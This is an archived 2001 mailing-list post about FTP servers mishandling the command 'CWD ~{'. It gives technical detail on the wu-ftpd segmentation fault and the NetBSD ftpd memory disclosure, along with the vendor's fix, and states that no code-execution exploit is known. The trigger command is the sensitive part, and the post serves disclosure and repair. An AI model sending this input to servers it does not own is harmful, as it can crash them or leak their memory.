Vulnerability Development mailing list archives

Previous By Date Next
Previous By Thread Next

Re: some ftpd implementations mishandle CWD ~{

From: Matt Power <mhpower () BOS BINDVIEW COM>
Date: Thu, 10 May 2001 00:41:50 -0400
On Wed, 2 May 2001 15:10:47 +0200, Christian Hammers <ch () WESTEND COM>
wrote:


               ... you say that the server is DOS'able from remote...
Or maybe it's just the one thread that crashes and the main server will handle
others connections further on. (I haven't had time to really look at this)


Typically connections would be accepted by inetd or some other program
that has a similar role (tcpserver, xinetd, etc.).

Here are some further details about what I originally posted:


(1) wu-ftpd 2.6.1 on Linux ...
...
   behavior of server: segmentation fault ...


Some people have stated that the segmentation fault in wu-ftpd is due
to dereferencing a NULL pointer. This might be true in some
environments, but on (for example) Red Hat 6.1 Linux, the segmentation
fault is due to a call to munmap with a specific non-zero address that
happens to not refer to a valid memory location. In general, at the
application level, the problem occurs because free is called with an
incorrect argument. This is a non-zero argument in the Linux case.

I've also been asked about when the code that leads to the
segmentation fault (i.e., the "blkfree(&globlist[1])" code) was added
to the ftpd. It was added in between wu-ftpd-2.4.2-beta-13 and
wu-ftpd-2.4.2-beta-14. The change might be related to this section in
the FIXES-2.4.2-BETA-14 file:

  "contains a number of fixes for various memory leaks in the glob
  routines as well as some logic problem in the processing of the
  ABOR verb"


(2) NetBSD 1.5T ...
...
   ftpd banner:
   220 hostname FTP server (NetBSD-ftpd 20010329) ready.

...

   Off hand, it looks like the server is responding with data from an
   inappropriate memory location. ...


vendor response:

     As of 2001/04/17, (ftpd version string "20010417a"), NetBSD's
     ftpd doesn't use glob(3) for explicit ~ processing in pathnames,
     so it's not vulnerable to this particular attack.


There isn't any ftpd for which I've found an exploit by which the
"CWD ~{" behavior can be leveraged to allow execution of significantly
undesirable code.


Still the same, and I haven't heard of anyone else finding an exploit.

Matt Power
BindView Corporation, RAZOR Team
mhpower () bos bindview com
Previous By Date Next
Previous By Thread Next

Current thread: